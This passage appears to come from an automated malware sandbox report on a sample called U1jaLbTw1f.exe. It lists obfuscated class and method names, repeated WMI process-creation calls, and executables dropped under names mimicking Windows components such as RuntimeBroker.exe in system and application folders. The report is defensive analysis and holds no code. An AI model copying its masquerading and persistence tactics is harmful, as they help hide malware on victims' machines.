                              Source: U1jaLbTw1f.exe, wxNxJf5lAuyxgEKkwTr.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'tcx5ou9UJJ', 'y8Af12VOqhREuE2MJrDh', 'VZYmECVOj5WhFkaseEYQ', 'b8kD51VOyF5jErQdJotC', 'Ogc4lRVOC0xtkWC7Tk5q', 'uxxaTlVO416ZgXhTRVPw', 'FHIMa1VOrWdp7EtxT5A3'
                              Source: U1jaLbTw1f.exe, RO3cpgzPkKAT2k0ygT.csHigh entropy of concatenated method names: 'wWcVVkTr8g', 'jdwV9iVFCt', 'XmCV7oXiC9', 'wwyVuPE843', 'MPlVAICAcn', 'sAiVTBGFwk', 'GXPVWSj1Ug', 'a70h1mVUAMnJgWbXXWhY', 'uTFRovVUTk3e5sG6b2OJ', 'zU590kVU2YjoJhsYd27r'
                              Source: U1jaLbTw1f.exe, QxijkLCKiFZ73DB27IM.csHigh entropy of concatenated method names: 'LUECdGK8i5', 'ul0Cv2Uett', 'X6nCzxZbdA', 'T2L4REZGKN', 'wE94VkniqO', 'gAw4Bcnulx', 'dwX49TA8rK', 'CPp47gUknM', 'Td24uLZjkG', 'bH14AgbLaK'
                              Source: U1jaLbTw1f.exe, WMle3CMtwjbfuKJmavE.csHigh entropy of concatenated method names: 'hCsMgTiH7M', 'rfklZnVQGCnR8t14arqx', 'pZ1CueVQpMCGUZy7uojM', 'vx2aLdVQt48yxwOX9cd2', 'IZMNo6VQgFePiO50MNjG', 'rXIrwtVQXDPdSVapZKbR', 'EkNoPTVQbjnGM7mN9v3h', 'vRXTvsVQsdB2vvXgY1Km'
                              Source: U1jaLbTw1f.exe, EEQFDRTWD25gtIXK2aK.csHigh entropy of concatenated method names: 'tBDTiBxTMQ', 'Jd7TplZb2Q', 'PRYhuKVopMvHxAY8I6NL', 'TIHhIGVotc7VVTuU22Ef', 'ecGwAaVoGU9JRF5nwVdp', 'fjr4nwVogik5xHeqyqxm', 'WpwlCnVoXiyRViuSXGAM', 'HMNN31VobpHL4Jj4iAlb'
                              Source: U1jaLbTw1f.exe, dB0bpqylR7wKddrlQMO.csHigh entropy of concatenated method names: 'UNUyoNjEaK', 'LC4y8atEBO', 'S1VyJ5ij9l', 'aPZyqxbH5W', 'orAyjjoneM', 'g33yyl8Of0', 'MTwyCXJ7CQ', 'pk8y4IAKM1', 'xVqyrHBCX3', 'rK6yeYXLM0'
                              Source: U1jaLbTw1f.exe, DXsBoYEHCgdJDxxn6qq.csHigh entropy of concatenated method names: 'GIUEEIy9I6', 'b14E3esjI2', 'fPEEUQAiAF', 'rphEa11bYr', 'IH8EMKrFhG', 'Twa9PSVwdj5Wnm3BC7J8', 'U7GNTHVwKyYaZ3nHJAHj', 'FgNRs7Vw1eZ1y34e13Uq', 'bLxq0wVwvVZhhslrNibR', 'aOTCBkVwz1KtE8KJVNGR'
                              Source: U1jaLbTw1f.exe, padYf5Blj2wVPJcZVWw.csHigh entropy of concatenated method names: 'SS1BrrpWEs', 'zJBBe064Q9', 'xWxMc5Vajbex26pcPmIs', 'LkmHfyVaJDllpyFxWwn5', 'qPya84Vaqi9VwkaZsqpN', 'GKlPAwVayDcy2JgK0Nct', 'VaxBf5s5le', 'F6mHs1Vae8hXOqE2cxT1', 'KZIaiuVaku6ACgPKUP2G', 'TkBvWDVa4lOEl5uSRmcu'
                              Source: U1jaLbTw1f.exe, XlDgIlBucFfARK4Tl9c.csHigh entropy of concatenated method names: 'nKgBTPXrWi', 'PZrB2YVidG', 'TkQBWaE5PI', 'qyQBFVwq54', 'gt5CxHVaGfVO3kBasq5Q', 'U4tDFnVapUmv7CoQp3jc', 'fSatgFVathr1iLWrrDtI', 'NVsKb3Vagx84rOXqcmTF', 'vrrltCVaXT6X1tQBQNLh', 'QLpdvAVabRMluJ6fiBrn'
                              Source: U1jaLbTw1f.exe, kqFQLuS5RwFFgIK6rR8.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'kEOV2ty7fDf', 'L4XV70ul3Nt', 'BIwXi9V4nZkV9IhksFDj', 'IyrYK2V4IuDpOtHAoKCc', 'ufreguV4H6OsLKOMnd5h', 'wsUOLhV4ZNhkPY1gdMvf', 'JdOV9mV4E551KAVZ8q6v'
                              Source: U1jaLbTw1f.exe, ubj50ogifKXMNGlnFv5.csHigh entropy of concatenated method names: 'Dispose', 'nbHgtaPRGG', 'P06gGLKN7q', 'J0jggE1WGM', 'tF1W5FVyBDwr3SL6plTh', 'edBVlUVy92YtYnkJPxVt', 'JnQaLsVy7TGRk5eNrjtW', 'YUXHQjVyuso4Mjy9S3Nv', 'brmgnxVyAexhwBuBF4HI'
                              Source: U1jaLbTw1f.exe, aJvwXIl26qhN82FZwGv.csHigh entropy of concatenated method names: 'h7UlF4XvRr', 'sVWliKvoWT', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'kqVlpoFB8N', 'method_2', 'uc7'
                              Source: U1jaLbTw1f.exe, gh9CEDWHgFtfG7mpvHr.csHigh entropy of concatenated method names: 'PPiomEVjkSWXXAloj26c', 'te9NZRVjriXPgc0Hf22R', 'h8UD19VjeUbwf06rAi7a', 'AM9Gv24n5t', 'n8skkLVjQEuFXpjk6RGR', 'zN2XLWVj0nDS6xHdC1LY', 'MR3qraVjfsfCVUWxNZ3x', 'BEowORVjxGlSgcmfm8Vg', 'BTegVrOONV', 'CRiAadVj5Iy3m2HWNvgJ'
                              Source: U1jaLbTw1f.exe, eOQvgVdC6XH3DTl64nH.csHigh entropy of concatenated method names: 'iHJVAhGRcqj', 'LcmVAomZSn7', 'qEMVA81n7yA', 'HIuVAJ8jpX5', 'DFxVAqdT6W0', 'jFsVAjIy2vh', 'AdrVAypEQTM', 'fwBvuJe71W', 'dA8VACH5jqy', 'u3ZVA499ger'
                              Source: U1jaLbTw1f.exe, LkhdJYLvZIaGfARWOhw.csHigh entropy of concatenated method names: 'GD6lRQwT8f', 'pu8lVejnWO', 'Yd7', 'VjKlBSROoy', 'VF2l9QAIwO', 'Rdnl7rQMr2', 'mx2luiLarc', 'MFc5kbVxDa65SmeQsc3t', 'nCyndNVx69P4nAnHMcNS', 'gbZAATVxN9X2lHogJM4o'
                              Source: U1jaLbTw1f.exe, RpGtApLwF9bC8F3ujAe.csHigh entropy of concatenated method names: 'SemLfwV08Q', 'L5ILQerZja', 'dkKLxWclCs', 'E6mL675ZD2', 'mRXLNdL4xQ', 'Dt1ZKoVxyB0OhAaSGQWC', 'C59qGKVxCljy7HJeLVcc', 'z1dnmjVx4Z0XmJRakdjr', 'mZwkZbVxq2S1bEcjZFsh', 'qYyrEvVxjxkFq9Gpty1b'
                              Source: U1jaLbTw1f.exe, zGGN94Vvkm8Jmr0cEnh.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'hmqV2Vxmxkh', 'zUmV7V8uNE0', 'nrHYWZVUvma0e33uMd5D', 'ELRyXAVUzgn9gbPmf4OM', 'oj0ETkVaR59wrvUcIeUP', 'XricwPVaV7jQbZfVXvRS'
                              Source: U1jaLbTw1f.exe, yfAQXgTSCnhB3G9V14Q.csHigh entropy of concatenated method names: 'qvgTaay5wc', 'wAvLbIVoCmfHPLOJ0PqQ', 'zbsw5IVojqbrwEtkSwhp', 'wC25DgVoydlV2RrPQckF', 'CKXV5tVo4oRMovNx50V8', 'wg1nwaVorhZrnU2cCEEq', 'Ee8TYKxFhS', 'pRHTnh7jjc', 'GKjTIHduyM', 'dTbTHaO6bQ'
                              Source: U1jaLbTw1f.exe, kbnN8YWGBfjl7w5F3h2.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'ikUK27VJqMWYZAmebqNQ', 'xN8ND5VJjQ63bXjD0fvI', 'BykhkRVJy2sNYIMSgTWC', 'B51WXkPSxQ'
                              Source: U1jaLbTw1f.exe, UvYfdhZkGvnDKHyppSk.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'c26Z0uWk4h', 'PwXZftw7WZ', 'Dispose', 'D31', 'wNK'
                              Source: U1jaLbTw1f.exe, ndsWLD8n3IB8VYHKbyy.csHigh entropy of concatenated method names: 'method_0', 'pJM8H1diKX', 'method_1', 'X61', 'Ly2', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length', 'get_Position'
                              Source: U1jaLbTw1f.exe, w6khP8uNj77rwVAWkCj.csHigh entropy of concatenated method names: 'LTvu1oNh5I', 'Ay0udTY0qg', 'DXNuvtxbVK', 'qajuz4heF4', 'VbZAR1HnHC', 'ONNAVxhq9b', 's5vABUIAr8', 'v2pHBWVhtPqRlJNe2MmW', 'TB91JmVhicssaFPpHCH0', 'K0h5hQVhpwOehYTfQgPt'
                              Source: U1jaLbTw1f.exe, R63Buyo6RPYbIeJDDhs.csHigh entropy of concatenated method names: 'ltZoDIXRCC', 'k6r', 'ueK', 'QH3', 'TFxo59c90l', 'Flush', 'lSVocvkJq5', 'hCGoO0vAMV', 'Write', 'U4toK5ir8p'
                              Source: U1jaLbTw1f.exe, RlbKXpOthvQsEZiSmL2.csHigh entropy of concatenated method names: 'fE5OXY8iqV', 'cf0OSlPr5c', 'JQCOnmXcQE', 'Y9sOIH6bcF', 'WDTOH1TQtp', 'r3oOZ6w518', 'eE6OE2OLxJ', 'Ge5O3UEo2Q', 'Dispose', 'E7qZWJV12mGCkdrwmxQP'
                              Source: U1jaLbTw1f.exe, ktvx3d86cm28i05gkyl.csHigh entropy of concatenated method names: 'rJ0B4ZVD7lcpSx5pfL0b', 'Vl3vQJVDBJ5nfNVZHTY0', 'yLQ9OQVD9YpQUnwvHY76', 'Rr78D6ALKx', 'Mh9', 'method_0', 'tkB85Zgj3k', 'Irk8cHccKr', 'B3n8ObXl9V', 'GU58KFL326'
                              Source: U1jaLbTw1f.exe, yIlJGnntmc4dVvxNeUi.csHigh entropy of concatenated method names: 'DlNHVtcSoQ', 'VPeoifVkLS3UgZbmt8lT', 'KnatPvVkau7TonQNZOFK', 'Iml2PdVkMZIYUG6eLCJ9', 'SlU7FMVklZx8ktEbl4uR', 'oMWngg02eB', 'I9qnXPcuO3', 'R5ynbvawKj', 'Y8OnsYqWZd', 'OKTnPjSZdO'
                              Source: U1jaLbTw1f.exe, MsXXArKsWAhV0MT7wxJ.csHigh entropy of concatenated method names: 'QEplxbVd7yPTLYo4fkeY', 'rsCQn7VduP2JDdTaIZj2', 'jYb15i46EN', 'SpCTiZVdWlj2boi2yW98', 'qBxZDQVdFqDSs8eXwi6O', 'uDHX2bVdidYmtG3Nqm6T', 'ycXqcoVdpcjxTBQnZolj', 'bxe5Q5VdtldcOR87VJhM', 'qyFx3oVdGLsmZBFdTM5s', 'mx9LwdVdgk9Tt6MdAFZZ'
                              Source: U1jaLbTw1f.exe, hQbM5AkCNdHNHt7ws1.csHigh entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'uvA0riEY7'
                              Source: U1jaLbTw1f.exe, ahxI3W7CxGGb5NbR3Nq.csHigh entropy of concatenated method names: 'lpv7dKFsUw', 'p48cpMVluGqsGBvtbFK5', 'dl2jr2Vl9ljHoN2f21eA', 'LT73uZVl7uWfKwtXYgMh', 'pO1IT7VlTSTwMQLogARI', 'DnYZs8Vl22R5l7Rq7ckO', 'vnU9rCVlWr2hGQUBo6XP', 'syIuAr7r0x', 'tepPAMVlidGax33gIb90', 'YEOgJjVlpWpPiMQxojS5'
                              Source: U1jaLbTw1f.exe, iaFsjqmxJQsJrR6mwYG.csHigh entropy of concatenated method names: 'BhIV2bxxxRV', 'MdYmNTIlgI', 'L61V2s7fvTR', 'cvERfWVrUnDjuVxAgkL4', 'RnTwxXVraWUXeINR2oEi', 'JrtxvyVrEB6EDK9TMc1m', 't8Jq4JVr3egjA7Pg1yxJ', 'GyRHZAVrMR1N2o9nyR9g', 'yH0DT7VrLvAjkPETYIbH', 'LKYl2XVrlFONTZEdglJu'
                              Source: U1jaLbTw1f.exe, mEYfew937bE573yYg67.csHigh entropy of concatenated method names: 'HPw9eIJcYs', 'LD39k81Fgv', 'NNl9wpodTY', 'a0p6OdVMkumXvFlXh70r', 'abtujVVMrYqmBgNs8ygC', 'qxuK6lVMehQv99jIL2eI', 'wyM9abhnv4', 'i1n9M3OyZB', 'b4m9LOa0gu', 'aoE9l31y0Q'
                              Source: U1jaLbTw1f.exe, j4cU4uhYvoL2B6iAiOC.csHigh entropy of concatenated method names: 'wJhoGBRMT1', 'mplslSV60pU6EiAugo59', 'L1G0hBV6kAkTRko8sqvY', 'OPwYJpV6waMICP1s29d1', 'oRh1lyV6fhN4FODLicdu', 'kt5', 'zG2hI9QY82', 'ReadByte', 'get_CanRead', 'get_CanSeek'
                              Source: U1jaLbTw1f.exe, AifqQE96WpTfA6pc0eq.csHigh entropy of concatenated method names: 'TxO79Fi7P8', 'x7j77lsbke', 'uKB7uuqYru', 'fYYKptVL7v1gaY9kWyGD', 'EBx1SPVLu3bn428svAht', 'rk3u3oVLBh3tmhc3lhx2', 'EiN7WNVL9CJ6jLrh58ii', 'bTE7iNauR5', 'yKhsudVLTdce6trMJESQ', 't6Q5NBVL2fGrE6Q1Kumk'
                              Source: U1jaLbTw1f.exe, l4wFCusDlUfZs6AY4s.csHigh entropy of concatenated method names: 'vu38ESArU', 'ymUJUkV3LTMiDNXWGOwr', 'wXRuYhV3aoLKCrv4ZuRg', 'v6RrlgV3MGDjS6vl7IF0', 'SIKSw9mhr', 'deam68d7E', 'iMKYRQ0yb', 'i4hn8rQ2b', 'NnfIObtcL', 'BnQHTPsqY'
                              Source: U1jaLbTw1f.exe, pBTUHOdPZQIUrjJHcks.csHigh entropy of concatenated method names: 'vrpdMyG7tB', 'uyNdLO4j0A', 'OCEdlcYJad', 'EV9dhJCPIR', 'N02do0SNDF', 'irXd80NTV7', 'RPMdJmiCeJ', 't8IdqsY98r', 'PqbdjbNCa7', 'LAKdy3ZqfS'
                              Source: U1jaLbTw1f.exe, i1DIIqSyw9rSMjVLwGL.csHigh entropy of concatenated method names: 'fHDS0T842G', 'ySuSfs9KYE', 'TWDSQItLBn', 'lvl6aOV4tWXoZP8j9fGW', 'AfTU4bV4GiWlwEupSODq', 'QwLS7kV4iTQD6dlwKbf3', 'ywQinCV4pJLGic071ETI', 'LW2S4b2jl4', 'HtxSrGYQ9A', 'sAeSedHJmw'
                              Source: U1jaLbTw1f.exe, IjSCW2U9bUgc99SVEah.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'R9dUuyUGLj', 'Write', 'fVaUAn88UV', 'yxcUTYVRFp', 'Flush', 'vl7'
                              Source: U1jaLbTw1f.exe, bx2uSFyW0d9ZsWUe4rf.csHigh entropy of concatenated method names: 'nbuyZjZuX7', 'sQj0uRV5pbBVdZs5JFDc', 'RusiP7V5FwKCPlLsSs9m', 'Hh4GkcV5idvCUZBXYarw', 'SeRycPV5tKNHSknYYsdS', 'Db64kFV5Gv1JOViDpchI', 'IPy', 'method_0', 'method_1', 'method_2'
                              Source: U1jaLbTw1f.exe, yPydGtCl28GsAUR8ZA4.csHigh entropy of concatenated method names: 'zt9CoP5te6', 'BcVC80IFNb', 'LWeCJnDBtg', 'GAeCqyloSM', 'ek5CjVpa0V', 'x9kCy8xwEi', 'c2eCCdFvd2', 'xqAC4Xai84', 'yrwCrr4Jut', 'aVFCeyh6pV'
                              Source: U1jaLbTw1f.exe, jLMddhHNI6iJkcIteDg.csHigh entropy of concatenated method names: 'XEhH5K6UIn', 'cOUHcGhu85', 'K9RHONCwry', 'SrcHKgiiAr', 'cqnH1TWaZf', 'vfNPFGVkKq8rYXn2W30R', 'kTT5dnVkcKxZAoRhINnO', 'eRbFmTVkOwbiGlC3dynm', 'QbmMknVk1sW9beNQ6vyA', 'E332sBVkdNXBhNaWOuHq'
                              Source: U1jaLbTw1f.exe, BDUI9LUrkX8IueC2IbB.csHigh entropy of concatenated method names: 'PigUd8jcWQ', 'ycaUzv81EN', 'C77Uk1pFTE', 'vjgUwjI9FC', 'Of2U0f35f7', 'n9uUff64Rn', 'gbxUQFeb2g', 'tROUxQZD3u', 'A49U69g4Uk', 'jE6UNS2Put'
                              Source: U1jaLbTw1f.exe, xqclovTV1QeKaK43lEb.csHigh entropy of concatenated method names: 'mcXT9Il9om', 'WiBT7DcVJi', 'fI7TuHXgaa', 'Lt0EkGVouADmirL0787w', 'jrg6cZVo91CcCDFAcoYE', 'SrJRxZVo7urgiEJXGJNF', 'hkDxlpVoAQe1YmwSMLpw', 'kSPIFYVoTQqxK0oVtVkq', 'MnGb5pVo2loIiJXXDBiF', 'jhkVRyVoWdxwS0Gvl4Nv'
                              Source: U1jaLbTw1f.exe, RPV97pHFckI0wUXoYWi.csHigh entropy of concatenated method names: 'uW2Hlw4xRK', 'BQWHpnhpsT', 'BSOHtMCPEE', 'z0YHGZJ06y', 'fVbHg4HLYn', 'jcgHX7SjBr', 'UXtHb5Bfe3', 'k4HHsUPwG9', 'xaXHP37Itt', 'E0lHSuibsd'
                              Source: U1jaLbTw1f.exe, Er9L7GM4rpTsMq7hp9o.csHigh entropy of concatenated method names: 'xpYMep4Hi0', 'RFIMkxXGEj', 'PelMw376GB', 'zlBM0RubFe', 'hE6Mf9uQpF', 'fKmMQOLYXH', 'q16Mx5NLxl', 'uwSM6HBZ3F', 'xTPMNDc7eN', 'qQrMDX2eGD'
                              Source: U1jaLbTw1f.exe, HqHp6AgI8NFR8xx0mNR.csHigh entropy of concatenated method names: 'S66StZn8jG', 'Bv3SG2AX0i', 'XQfhCAVCfASoaKRmkMb0', 'kAUOD2VCwxQFOEOo1a9k', 'hHISjtVC0Kh8DmLFvgvX', 'QU6NUiVCQOEyqbwrBeo7', 'nOkVRYVCxmg3ieFPhc3Y', 'okbSSi7Nc6', 'mioQj1VCNc0ElBAQSoB3', 'ULDE7sVCDHu28q8Aq2HE'
                              Source: U1jaLbTw1f.exe, LTvBrqoJu9887GdUDwH.csHigh entropy of concatenated method names: 'Close', 'qL6', 'sOJoj5pquY', 'B6voyciWAf', 'YBXoCxbg66', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                              Source: U1jaLbTw1f.exe, A0n4cgmGNiXVmBOYuhA.csHigh entropy of concatenated method names: 'lTImmm24G9', 'a11IQQV4OOS3nx5tqoP3', 'H86fx2V45ebrXvNZlb7C', 'LOZakOV4cCjpEKr4gfyr', 'p8iSD1V4K7QhaFrMuLrg', 'YubmXa6AMr', 'BSOsrcV4x4HQrKryXI0K', 'syeOGAV4fRMC2uPZipV6', 'AUvfyjV4Q45A3yedDa62', 'N8iF57V46xxbQspkZqBZ'
                              Source: U1jaLbTw1f.exe, PaOn8J2FxTMx0wibbYI.csHigh entropy of concatenated method names: 'hOp2pGhwBH', 'ex52tmIKjD', 'sq42GA4IoX', 'JSkA8oV8SVsSK0qqevA1', 'W1HejuV8mUnmA915BMKe', 'PdmbmBV8sp33Ct4KWxLN', 'VR3OuxV8PNGll8s6gmHT', 'CxURhTV8YH58lgpXVE5j', 'DMgLMKV8nZdXOpsr9w78', 'ESsIoiV8IjuBYqDtDc7c'
                              Source: U1jaLbTw1f.exe, H8uvdmuXCNEVZ6pvyA2.csHigh entropy of concatenated method names: 'XMiuU4AdQH', 'gxRuau353Y', 'eMguM63WX9', 'm9F9EaVlqM5Nc925DN8y', 'JBOAQKVlj0i7N5GUjajm', 'kBJhv7Vl8jhaRmFDtDFX', 'm3qEVBVlJkhCsRsQmJfQ', 'teWuH9Zjff', 'sHluZRGJGE', 'dGpQAqVlltNQ6Yifn6lo'
                              Source: U1jaLbTw1f.exe, VRCikfKRNhFEsTs3Bbo.csHigh entropy of concatenated method names: 'ygoK7MMH28', 'm5MKueXeEY', 'lZCn43V1k5LuvEbcPoiL', 'IBEX7oV1wa74pN2tq91c', 'zBWfAOV1rD8SlTlB52OB', 'PnMWgMV1e2il6FCtkA8E', 'oGf58fV10TT2lbdE3p8D', 'PK7H8qV1fs91a92U40no', 'Ki0KBcRjGk', 'c8vOyJV1ycnZjuSqLIqN'
                              Source: U1jaLbTw1f.exe, UQlATi5jTZpfM2pT7Pb.csHigh entropy of concatenated method names: 'aMJV23dfyky', 'RDGVAE01JSB', 'wa4HnfVKT7Mx1h9G6jVw', 'r8nlHKVK200JTWpFBqNi', 'T0orjQVKW2Q25fK5aiTO', 'TeRjGKVKimaA1MYhqO0J', 'M9tvmYVKpfswqrv4LrEG', 'vl216NVKtZuDBde8HHKV', 'imethod_0', 'RDGVAE01JSB'
                              Source: U1jaLbTw1f.exe, RUE7GcWBBZH1gvL5U13.csHigh entropy of concatenated method names: 'vyWW7O1v79', 'ak3WuphbLU', 'eflWAARCnW', 'Hg9WTC1MdJ', 'n9uW2Hg84Y', 'AT4WWt7D6e', 'VjlWFwk0CT', 'FFXWiswIhy', 'N2GWptrLAW', 'SvDWtgv1dn'
                              Source: U1jaLbTw1f.exe, rQojWTV5HqPW1LCvwx0.csHigh entropy of concatenated method names: 'P9X', 'soyVO2fMyN', 'GqEV2RbV2x6', 'imethod_0', 'UyuVKphdZD', 'fabwFxVU5pogCpjAgLjk', 'JZhElNVUcM9KKKrZsJmt', 'gD4I8ZVUNk8bB1Pb0QkB', 'NLgPxqVUD3fWk7FOghej', 'dBBqugVUOMi3Vifek6Jv'
                              Source: U1jaLbTw1f.exe, WF3cBF7h9wNdwa2odF4.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'KxXV27J3P8t', 'zUmV7V8uNE0', 'yZRWYoVL83VGqkbhQ7HU', 'x6BgmfVLJ6aqGTnb30d5', 'QOfFKiVLqLdQfnmPTQwh', 'yNKKp4VLjwrHYhflkNKT', 'V7H0rfVLyIZ3w9mOxeVO'
                              Source: U1jaLbTw1f.exe, oTEmdMA8yf2MPLRiL0Y.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'XrhV2FEGAAi', 'zUmV7V8uNE0', 'vO83ieVhChYrHR9AyoCx', 'SgrAhoVh484dXWDyZSWf', 'ntqoJHVhrljW0ollg1Tf'
                              Source: U1jaLbTw1f.exe, naCTPgywJ6bVVgevQum.csHigh entropy of concatenated method names: 'k1aV2Zuvi4I', 'PVHyf30NCm', 'JohyQSldeU', 'VXgyxujj8w', 'YGmId3V5ZRvh3tj6ZLnJ', 'B2UrQLV5E8oL5V9P73Dd', 'MK26CaV53Gwj30Xvgahq', 'QN77qiV5UjsiUB3FLFcs', 'TvZ6WKV5aaJiGfCgVLdU', 'fElH2VV5M4RndJDGHQOj'
                              Source: U1jaLbTw1f.exe, kI7xF1BmbtOTtZTjljD.csHigh entropy of concatenated method names: 'bwbBnHrKo2', 'Xx5BISOhUI', 'uTjlTcVaZpul4kWxTkqQ', 'zQ8txiVaEYslu800eNRe', 'vPrfaFVa3IwH6wxE5Sxy', 'qTjwWoVaUo55fHMOQa2S', 'gp4YsZVaaZwYi7h6Mw9J'
                              Source: U1jaLbTw1f.exe, LWNtxi3ienJJ98tVmZe.csHigh entropy of concatenated method names: 'yx83t1AFyK', 'Ey93GWS6Yq', 'siX3gJfEWT', 'Ajk3XDe9Rk', 'yXo3bR5EXl', 'm0sPf1V0buogWaxuUmU1', 'UA2eKIV0gxZrfa6cioO2', 'qrryZMV0XlQEXY6WgyeX', 'h07GFgV0sH3xibZ4QJRd', 'goR51dV0Pdymab40BbOD'
                              Source: U1jaLbTw1f.exe, S2SRKU2bsRePr4hf5E6.csHigh entropy of concatenated method names: 'e3y2mdfvO9', 'tC4yCbV88AFWFeyFJpDu', 'HJtgFWV8h2xnZmtp64EW', 'KkpEwnV8oIWLNF5GyB8j', 'zE2Au2V8JoKsK460Lvos', 'Jwv2PMfChW', 'li6NG6V8abE85SWtIqv3', 'dc4iXHV8Mwn39puGbwUw', 'iVR7xKV83AwSm5Kr0sPS', 'm33MZ5V8UbZIjZbje8PM'
                              Source: U1jaLbTw1f.exe, MG3k0g20joNmWvDdGap.csHigh entropy of concatenated method names: 'zkZ2ORQ1X0', 'gGw7HLVJt1Vpx1fwtYAM', 'XKcSmTVJiWyCaJOosoPO', 'QyPhiUVJpFNyeMSBrMCO', 'RPWNV5VJGZebiJTmDg5O', 'P9X', 'vmethod_0', 'CF0V7Uig8w9', 'imethod_0', 'VCQVFJVJTL5jyJyEY6SB'

                              Persistence and Installation Behavior

                              barindex
                              Creates processes via WMI
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Drops executable to a common third party application directory
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile written: C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exeJump to behavior
                              Drops executables to the windows directory (C:\Windows) and starts them
                              Source: unknownExecutable created and started: C:\Windows\LiveKernelReports\UserOOBEBroker.exe
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile created: C:\Users\user\Desktop\oGlGPwkc.logJump to dropped file
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile created: C:\Users\user\Desktop\YEfCwsuO.logJump to dropped file
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Windows\LiveKernelReports\UserOOBEBroker.exeJump to dropped file
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile created: C:\Users\user\Desktop\wJkgsuUR.logJump to dropped file
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Users\user\Desktop\cDNiSsHV.logJump to dropped file
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Windows\SchCache\RuntimeBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Users\user\Desktop\bGmawssa.logJump to dropped file
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Users\user\Desktop\mmgyBVMD.logJump to dropped file
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeJump to dropped file
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Program Files\Windows Security\RuntimeBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Users\user\Desktop\wVAOlxRk.logJump to dropped file
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile created: C:\Users\user\Desktop\tbIFYUNW.logJump to dropped file
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Windows\LiveKernelReports\UserOOBEBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Windows\SchCache\RuntimeBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Users\user\Desktop\bGmawssa.logJump to dropped file
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Users\user\Desktop\wVAOlxRk.logJump to dropped file
